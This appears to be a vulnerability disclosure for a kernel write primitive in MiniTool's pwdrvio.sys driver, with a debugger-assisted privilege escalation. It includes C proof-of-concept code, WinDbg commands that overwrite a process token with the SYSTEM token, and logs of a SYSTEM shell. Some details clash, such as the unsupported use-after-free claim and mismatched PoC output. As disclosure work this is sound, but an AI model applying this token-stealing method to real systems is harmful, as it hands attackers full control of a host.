
Project Date : Feb 2026 / Memory corruption vulnerability within the kernel driver of MiniTool. Demonstrates a debugger-assisted arbitrary kernel write primitive that can be leveraged toward privilege escalation.
Kernel write-what-where condition within the pwdrvio.sys kernel driver of MiniTool. Demonstrates a debugger-assisted arbitrary kernel write primitive that can be leveraged toward privilege escalation.
https://github.com/user-attachments/assets/ac81d7ce-0be7-40a5-9334-c54350e6e30e
Arbitrary Kernel Write → Local Privilege Escalation (LPE)
Severity: HIGH
CVSS 3.1 Score: 7.8 (LPE)
CVSS Vector String:
LPE: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Prerequisites:
Exploitation Results: LPE - Debugger-assisted privilege escalation demonstrated (NT AUTHORITY / SYSTEM), complete system compromise
Date: February 5, 2026
Activity: Systematic kernel driver fuzzing using custom Python fuzzer
Discovery Process:
Target Selection:
pwdrvio.sys as oldest driver (timestamp: June 16, 2009)C:\Windows\System32\drivers\pwdrvio.sys\\.\PartitionWizardDiskAccesser\0Initial Fuzzing:
ctypes to interface with driverWriteFile/DeviceIoControl to driver deviceVerifier Activation:
verifier /standard /driver pwdrvio.sys
Verifier Configuration:
Verifier Flags: 0x001209bb
Standard Flags Enabled:
[X] Special pool
[X] Force IRQL checking
[X] Pool tracking
[X] I/O verification
[X] Deadlock detection
[X] DMA checking
[X] Security checks
[X] Miscellaneous checks
[X] DDI compliance checking
Date: February 5-6, 2026
Activity: Established kernel debugging environment for root cause analysis
Setup Procedure:
VMware Serial Port Configuration:
VMware Workstation Pro → VM Settings
├─ Add Hardware → Serial Port
├─ Connection: "Use named pipe"
├─ Path: \\.\pipe\com_1
├─ End: "This is the server"
└─ I/O Mode: "Yield CPU on poll" ✓
Guest OS Configuration:
REM Administrator Command Prompt
bcdedit /debug on
bcdedit /dbgsettings serial debugport:1 baudrate:115200
shutdown /r /t 0
Host WinDbg Connection:
WinDbg → File → Attach to Kernel
├─ Port: \\.\pipe\com_1
├─ Baud Rate: 115200
├─ Pipe: ✓
└─ Reconnect: ✓
Result: "Kernel Debugger connection established."
Date: February 6, 2026
Activity: Identified arbitrary kernel write primitive
Analysis Steps:
Module Analysis:
1: kd> lm m pwdrvio
start end module name
fffff805`315f0000 fffff805`315f8000 pwdrvio (Jun 16 2009)
1: kd> !drvobj pwdrvio 2
Driver object (fffff805`XXXXXXXX) is for:
\Driver\pwdrvio
DriverEntry: fffff805`315f6008
DriverUnload: fffff805`315f1060
Dispatch Routines:
[00] IRP_MJ_CREATE fffff805`315f108c
[02] IRP_MJ_CLOSE fffff805`315f12f8
[03] IRP_MJ_READ fffff805`315f16c4
[04] IRP_MJ_WRITE fffff805`315f1564 ← Target
[0e] IRP_MJ_DEVICE_CONTROL fffff805`315f1404
Vulnerable Instruction Discovery:
Set breakpoint on write handler:
1: kd> bp pwdrvio+0x1641
1: kd> g
Breakpoint 0 hit
pwdrvio+0x1641:
fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax
Critical Finding: Arbitrary write primitive identified!
RAX) to address [R11-0x10]R11 is loaded from stack frame: mov r11, qword ptr [rbp+0xB8h]Date: February 6-7, 2026
Activity: Traced vulnerability from User-After-Free to write-what-where condition
Memory Corruption Chain:
IRP Allocation:
0: kd> !pool @rbp
Pool page ffffe60f84c38610 region is Special pool
*ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+
Pooltag Irp+ : I/O verifier allocated IRP packets
Buffer Relationship:
0: kd> r rsi
rsi=ffffe60f828df900 ← User buffer location
0: kd> ? @rbp - @rsi
Evaluate expression: 35823344 = 00000000`02229ef0 ← 35MB difference!
Analysis: User buffer is NOT directly accessible from RBP frame
RBP+0xB8 offset does not point into user-controlled bufferUse-After-Free Condition:
The driver maintains dangling pointers in the IRP structure:
// Ghidra decompilation (pwdrvio+0x1564)
longlong lVar1 = *(longlong *)(param_2 + 0xb8); // Load from IRP
// No validation!
lVar5 = IoBuildAsynchronousFsdRequest(...);
// Write to [lVar1 - 0x10]
*(code **)(lVar3 + -0x10) = FUN_00011364; // Arbitrary write!
Date: February 7-8, 2026
Activity: Developed token stealing technique
Exploitation Strategy:
Objective: Overwrite current process token with SYSTEM token
Windows EPROCESS Structure:
+0x000 Pcb : _KPROCESS
...
+0x4b8 Token : _EX_FAST_REF ← Token pointer location
Token Stealing Procedure:
Locate SYSTEM Process:
0: kd> !process 4 0
PROCESS ffffe7875ac86200
SessionId: none Cid: 0004 Peb: 00000000
Image: System
0: kd> dq ffffe7875ac86200+4b8 L1
ffffe787`5ac866b8 ffffc08e`6642f04f ← SYSTEM token value
Locate Attacker Process:
0: kd> !process 0 0 poc1.exe
PROCESS ffffe78760150080
SessionId: 1 Cid: 0678
Image: poc1.exe
0: kd> dq ffffe78760150080+4b8 L1
ffffe787`60150538 ffffc08e`6c37a066 ← Standard user token
Calculate Target Address:
Target = TokenPointer + 0x10
= 0xffffe78760150538 + 0x10
= 0xffffe78760150548
Reason: Instruction uses [R11-0x10], so:
(Target + 0x10) - 0x10 = Target
Perform Token Overwrite:
0: kd> r rax = ffffc08e6642f04f ; SYSTEM token
0: kd> r r11 = ffffe78760150548 ; Target address
0: kd> p ; Execute: mov [r11-10h],rax
0: kd> dq ffffe78760150538 L1 ; Verify
ffffe787`60150538 ffffc08e`6642f04f ← Token successfully changed!
Restore Execution:
0: kd> r rip = pwdrvio + 165f ; Skip to safe return
0: kd> r eax = 0 ; Return success
0: kd> bc * ; Clear breakpoints
0: kd> g ; Continue execution
Result: Process now has SYSTEM privileges!
Location: pwdrvio.sys offset 0x1641
Assembly:
pwdrvio+0x1633: mov r11, qword ptr [rbp+0xB8h] ; Load pointer from IRP
pwdrvio+0x1641: mov qword ptr [r11-10h], rax ; Arbitrary write!
Trigger Mechanism:
HANDLE hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0",
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, 0, NULL);
char buffer[0x100];
DWORD bytesReturned;
WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);
Exploitation Limitations:
This vulnerability requires kernel debugging tools for reliable exploitation because:
Register Control Challenge:
R11 is loaded from [RBP+0xB8]RBP points to IRP stack frame in kernel pool[RBP+0xB8] from user bufferPool Memory Layout:
RBP (IRP frame): 0xffffe60f84c38610
User buffer: 0xffffe60f828df900
Difference: 35,823,344 bytes (35 MB)
Required Manual Intervention:
R11 register to target address via debuggerRAX register to SYSTEM token valueMetrics:
Code:
#include <windows.h>
#include <stdio.h>
int main() {
HANDLE hDevice;
DWORD bytesReturned;
char buffer[0x100];
printf("[*] MiniTool PoC Trigger...\n");
printf("[*] Current User: "); system("whoami");
// 1. Connect to the Driver
hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0",
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("[-] Cannot Open Driver! Error: %d\n", GetLastError());
return 1;
}
printf("[+] Connected. WinDbg - BP 1641.\n");
printf("[!] WinDbg - Token Change - 'g'.\n");
getchar(); // Breakpoint of WinDbg
// 2. Trigger the Vulnerability (Sending Random Data to Driver)
WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);
printf("[*] Completed. SYSTEM Shell Opening...\n");
// 3. If we token is changed - SYSTEM Shell
system("whoami && cmd.exe");
return 0;
}
How to Compile:
┌──(PC㉿PC)-[/dir]
└─$ x86_64-w64-mingw32-gcc LPE_PoC.c -o LPE_PoC.exe -lntdll -static
WinDbg Process:
1: kd> bp pwdrvio+0x1641
1: kd> g
Breakpoint 0 hit
Unable to load image pwdrvio.sys, Win32 error 0n2
pwdrvio+0x1641:
fffff805`315f1641 498943f0 mov qword ptr [r11-10h],rax
1: kd> !process 0 0 poc1.exe
PROCESS ffff9d8f6401f080
SessionId: 1 Cid: 1948 Peb: 27a2a7000 ParentCid: 16ac
DirBase: 1b2528000 ObjectTable: ffffc2093fb93140 HandleCount: 58.
Image: poc1.exe
1: kd> dq ffff9d8f6401f080+4b8 L1
ffff9d8f`6401f538 ffffc209`40117738
1: kd> dq ffff9d8f6401f538 L1
ffff9d8f`6401f538 ffffc209`40117738
1: kd> !process 4 0
Searching for Process with Cid == 4
PROCESS ffff9d8f5f069040
SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 001aa000 ObjectTable: ffffc2093447ac40 HandleCount: 2517.
Image: System
1: kd> dq ffff9d8f5f069040+4b8 L1
ffff9d8f`5f0694f8 ffffc209`3441d8df
1: kd> r rax = ffffc2093441d8df
1: kd> r r11 = ffff9d8f6401f538 + 10
1: kd> p
pwdrvio+0x1645:
fffff805`315f1645 488d442440 lea rax,[rsp+40h]
1: kd> dq ffff9d8f6401f538 L1
ffff9d8f`6401f538 ffffc209`3441d8df
1: kd> r rip = pwdrvio + 0x165f
1: kd> r eax = 0
1: kd> bc *
1: kd> g
Terminal Output:
PS C:\Users\standarduser\directory> whoami # Standard User Identification
PC\standarduser
PS C:\Users\standarduser\directory> whoami /priv # Standard User Privs
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================== ========
SeShutdownPrivilege Sistemi kapat Disabled
SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Enabled
SeUndockPrivilege Bilgisayarı takma biriminden çıkar Disabled
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Disabled
SeTimeZonePrivilege Saat dilimini değiştir Disabled
PS C:\Users\standarduser\directory> whoami /groups # Standard User Groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================================= ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Yerel hesap ve Administrators grubunun üyesi Well-known group S-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
KONSOL OTURUMU AÇMA Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Yerel hesap Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Zorunlu Etiket\Orta Zorunlu Düzey Label S-1-16-8192
PS C:\Users\standarduser\directory>
PS C:\Users\standarduser\directory> .\poc1.exe # PoC Execution
[*] MiniTool PoC Tetikleyici Baslatiliyor...
[*] Mevcut Kullanici: desktop-usp1rvs\kali
[+] Surucu baglantisi basarili. WinDbg'da BP 1641 bekleyin.
[!] WinDbg'da Token'i degistirdikten sonra 'g' deyin.
[*] Islem tamamlandi. SYSTEM Shell acilmaya calisiliyor...
nt authority\system
Microsoft Windows [Version 10.0.19045.3803]
(c) Microsoft Corporation. Tüm hakları saklıdır.
C:\Users\standarduser\directory>whoami # Elevated User Identification
nt authority\system
C:\Users\standarduser\directory>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= =============================================================================== ========
SeCreateTokenPrivilege Belirteç nesnesi oluştur Disabled
SeAssignPrimaryTokenPrivilege İşlem düzeyi belirtecini değiştir Disabled
SeLockMemoryPrivilege Sayfaları bellekte kilitle Enabled
SeIncreaseQuotaPrivilege İşlem için bellek kotaları ayarla Disabled
SeTcbPrivilege İşletim sisteminin parçası gibi davran Enabled
SeSecurityPrivilege Denetimi ve güvenlik günlüğünü yönet Disabled
SeTakeOwnershipPrivilege Dosyaların veya diğer nesnelerin sahipliğini al Disabled
SeLoadDriverPrivilege Aygıt sürücüleri yükle ve kaldır Disabled
SeSystemProfilePrivilege Sistem performansı profili oluştur Enabled
SeSystemtimePrivilege Sistem saatini değiştir Disabled
SeProfileSingleProcessPrivilege Tek işlem profili oluştur Enabled
SeIncreaseBasePriorityPrivilege Zamanlama önceliğini artır Enabled
SeCreatePagefilePrivilege Disk belleği dosyası oluştur Enabled
SeCreatePermanentPrivilege Kalıcı paylaşılan nesneler oluştur Enabled
SeBackupPrivilege Dosya ve dizinleri yedekle Disabled
SeRestorePrivilege Dosya ve dizinleri geri yükle Disabled
SeShutdownPrivilege Sistemi kapat Disabled
SeDebugPrivilege Programların hatalarını ayıkla Enabled
SeAuditPrivilege Güvenlik denetimleri oluştur Enabled
SeSystemEnvironmentPrivilege Üretici yazılımı ortam değerlerini değiştir Disabled
SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Enabled
SeUndockPrivilege Bilgisayarı takma biriminden çıkar Disabled
SeManageVolumePrivilege Birim bakım görevleri gerçekleştir Disabled
SeImpersonatePrivilege Kimlik doğrulamasından sonra istemcinin özelliklerini al Enabled
SeCreateGlobalPrivilege Genel nesneler oluştur Enabled
SeTrustedCredManAccessPrivilege Kimlik Bilgileri Yöneticisi'ne güvenilen arayan olarak eriş Disabled
SeRelabelPrivilege Nesne etiketini değiştir Disabled
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Enabled
SeTimeZonePrivilege Saat dilimini değiştir Enabled
SeCreateSymbolicLinkPrivilege Simgesel bağlantılar oluştur Enabled
SeDelegateSessionUserImpersonatePrivilege Aynı oturumdaki farklı bir kullanıcı için bir kimliğe bürünme belirteci edinin. Enabled
C:\Users\standarduser\directory>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Zorunlu Etiket\Sistem Zorunlu Düzeyi Label S-1-16-16384
Test Environment:
Required Tools:
Step 1: Setup Kernel Debugging Environment
A. VMware Configuration
\\.\pipe\com_1B. Guest OS Configuration
REM Administrator Command Prompt in VM
C:\> bcdedit /debug on
The operation completed successfully.
C:\> bcdedit /dbgsettings serial debugport:1 baudrate:115200
The operation completed successfully.
C:\> bcdedit /dbgsettings
debugtype Serial
debugport 1
baudrate 115200
C:\> shutdown /r /t 0
C. Host WinDbg Setup
\\.\pipe\com_1Wait for connection message:
Opened \\.\pipe\com_1
Waiting to reconnect...
Connected to Windows 10 19041 x64 target
Kernel Debugger connection established.
1: kd>
Step 2: Compile Proof of Concept
Save as lpe_poc.c:
#include <windows.h>
#include <stdio.h>
int main() {
HANDLE hDevice;
DWORD bytesReturned;
char buffer[0x100];
printf("[*] MiniTool pwdrvio.sys LPE PoC\n");
printf("[*] Current user: ");
system("whoami");
// Open driver
hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0",
GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("[-] Failed to open driver (Error: %d)\n", GetLastError());
return 1;
}
printf("[+] Driver opened successfully\n");
printf("[!] Waiting for WinDbg manipulation...\n");
printf("[!] Set breakpoint: bp pwdrvio+0x1641\n");
printf("[!] Press ENTER when ready...\n");
getchar(); // Wait for WinDbg setup
// Trigger vulnerability
WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);
printf("[*] Exploitation complete\n");
printf("[*] Spawning SYSTEM shell...\n");
// If successful, this CMD will have SYSTEM privileges
system("whoami && cmd.exe");
CloseHandle(hDevice);
return 0;
}
Compile on Linux/WSL:
x86_64-w64-mingw32-gcc lpe_poc.c -o lpe_poc.exe -lntdll -static
Step 3: Execute Exploitation
A. Start PoC in VM (Standard User)
C:\> whoami
desktop-lfkkhu2\standard_user
C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
[Limited privileges - no SeDebugPrivilege]
C:\> lpe_poc.exe
[*] MiniTool pwdrvio.sys LPE PoC
[*] Current user: desktop-lfkkhu2\standard_user
[+] Driver opened successfully
[!] Waiting for WinDbg manipulation...
[!] Set breakpoint: bp pwdrvio+0x1641
[!] Press ENTER when ready...
[WAIT - Do not press ENTER yet]
B. WinDbg Setup and Manipulation
1: kd> bp pwdrvio+0x1641
1: kd> g
Now press ENTER in the PoC. WinDbg will break:
Breakpoint 0 hit
pwdrvio+0x1641:
fffff802`18b11641 498943f0 mov qword ptr [r11-10h],rax
0: kd> r
rax=fffff80218b11364 rbx=0000000000000000 rcx=ffffe78761218e20
rdx=ffffe7875ff72e10 rsi=ffffe7875dd48f20 rdi=0000000000000000
rip=fffff80218b11641 rsp=ffff9f801c707100 rbp=ffffe7875ff72e10
r8=0000000000000001 r9=0000000000000000 r10=0000000000000000
r11=ffffe7875ff72f70 r12=0000000000000001 r13=ffffdf0a0c48ecd0
r14=0000000000000000 r15=ffffe78761218e20
C. Locate SYSTEM Process and Token
0: kd> !process 4 0
Searching for Process with Cid == 4
PROCESS ffffe7875ac86200
SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 001aa000 ObjectTable: ffffc08e66444c80 HandleCount: 2471
Image: System
0: kd> dq ffffe7875ac86200+4b8 L1
ffffe787`5ac866b8 ffffc08e`6642f04f ← SYSTEM token value
D. Locate Attacker Process
0: kd> !process 0 0 lpe_poc.exe
PROCESS ffffe78760150080
SessionId: 1 Cid: 0678 Peb: a520317000 ParentCid: 14b8
DirBase: 402a29000 ObjectTable: ffffc08e6beb0780 HandleCount: 58
Image: lpe_poc.exe
0: kd> dq ffffe78760150080+4b8 L1
ffffe787`60150538 ffffc08e`6c37a066 ← Current token (standard user)
E. Perform Token Overwrite
0: kd> r rax = ffffc08e6642f04f
0: kd> r r11 = ffffe78760150538 + 10
0: kd> r r11
r11=ffffe78760150548
0: kd> p
pwdrvio+0x1645:
fffff802`18b11645 488d442440 lea rax,[rsp+40h]
0: kd> dq ffffe78760150538 L1
ffffe787`60150538 ffffc08e`6642f04f ← Token successfully changed!
F. Restore Execution
0: kd> r rip = pwdrvio + 165f
0: kd> r eax = 0
0: kd> bc *
0: kd> g
C. Verify Privilege Escalation in VM
[*] Exploitation complete
[*] Spawning SYSTEM shell...
nt authority\system
Microsoft Windows [Version 10.0.19045.6466]
C:\> whoami
nt authority\system
C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ==================================== ========
SeCreateTokenPrivilege Create a token object Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files/objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled ← SYSTEM!
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after auth Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as trusted Disabled
SeRelabelPrivilege Modify an object label Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Impersonate other session users Enabled
C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ =======================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled, Owner
Everyone Well-known group S-1-1-0 Mandatory, Enabled by default, Enabled
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory, Enabled by default, Enabled
Mandatory Label\System Mandatory Level Label S-1-16-16384 ← SYSTEM integrity!
MiniTool Software:
Product: MiniTool Partition Wizard
Version: 13.5
Installation Path: C:\Program Files\MiniTool Partition Wizard
Driver Path: C:\Windows\System32\drivers\pwdrvio.sys
Driver Date: June 16, 2009 (0x4A36F8D1)
Driver Size: 32,256 bytes
Testing Tools:
WinDbg Version: 10.0.29507.1001 AMD64
Python Version: 3.x with ctypes
Compiler: x86_64-w64-mingw32-gcc (MinGW)
Verifier: Windows Driver Verifier (Standard flags)
Primary Product:
Driver Details:
File Name: pwdrvio.sys
File Version: [Not available]
File Size: 32,256 bytes (31.5 KB)
Time Stamp: 0x4A36F8D1 (June 16, 2009, 04:43:45 UTC)
Digital Signature: [Signed by vendor]
Device Name: \\.\PartitionWizardDiskAccesser\0
Service Name: pwdrvio
Load Order: Boot Start (SERVICE_BOOT_START)
Other MiniTool products that may use the same driver:
Note: Each product should be tested individually for confirmation.
Tested and Confirmed Vulnerable:
Reason: Driver is compatible with all modern Windows versions and contains no version-specific checks.
This repository is provided strictly for educational, defensive security research, and vulnerability reproduction purposes in controlled laboratory environments. The information and proof-of-concept code are intended to help defenders, researchers, and vendors understand and remediate the reported vulnerability. Unauthorized or malicious use of this code against systems without explicit permission may violate applicable laws and regulations. The author does not encourage or condone illegal activity and assumes no liability for misuse or damage caused by this material.
This vulnerability disclosure report is provided for:
Prohibited Uses:
The researcher conducted all testing on personally owned systems in controlled environments. No unauthorized access to third-party systems was performed.
Report Version: 1.0
Last Updated: February 9, 2026
Register State Analysis:
0: kd> r
rax=fffff805315f1364 ← Kernel code pointer
r11=ffffe60f84c38750 ← Destination address (controlled via stack)
rbp=ffffe60f84c38610 ← IRP stack frame
0: kd> dq @rbp+0xB8 L1
ffffe60f`84c386c8 ffffe60f`84c38750 ← R11 loaded from here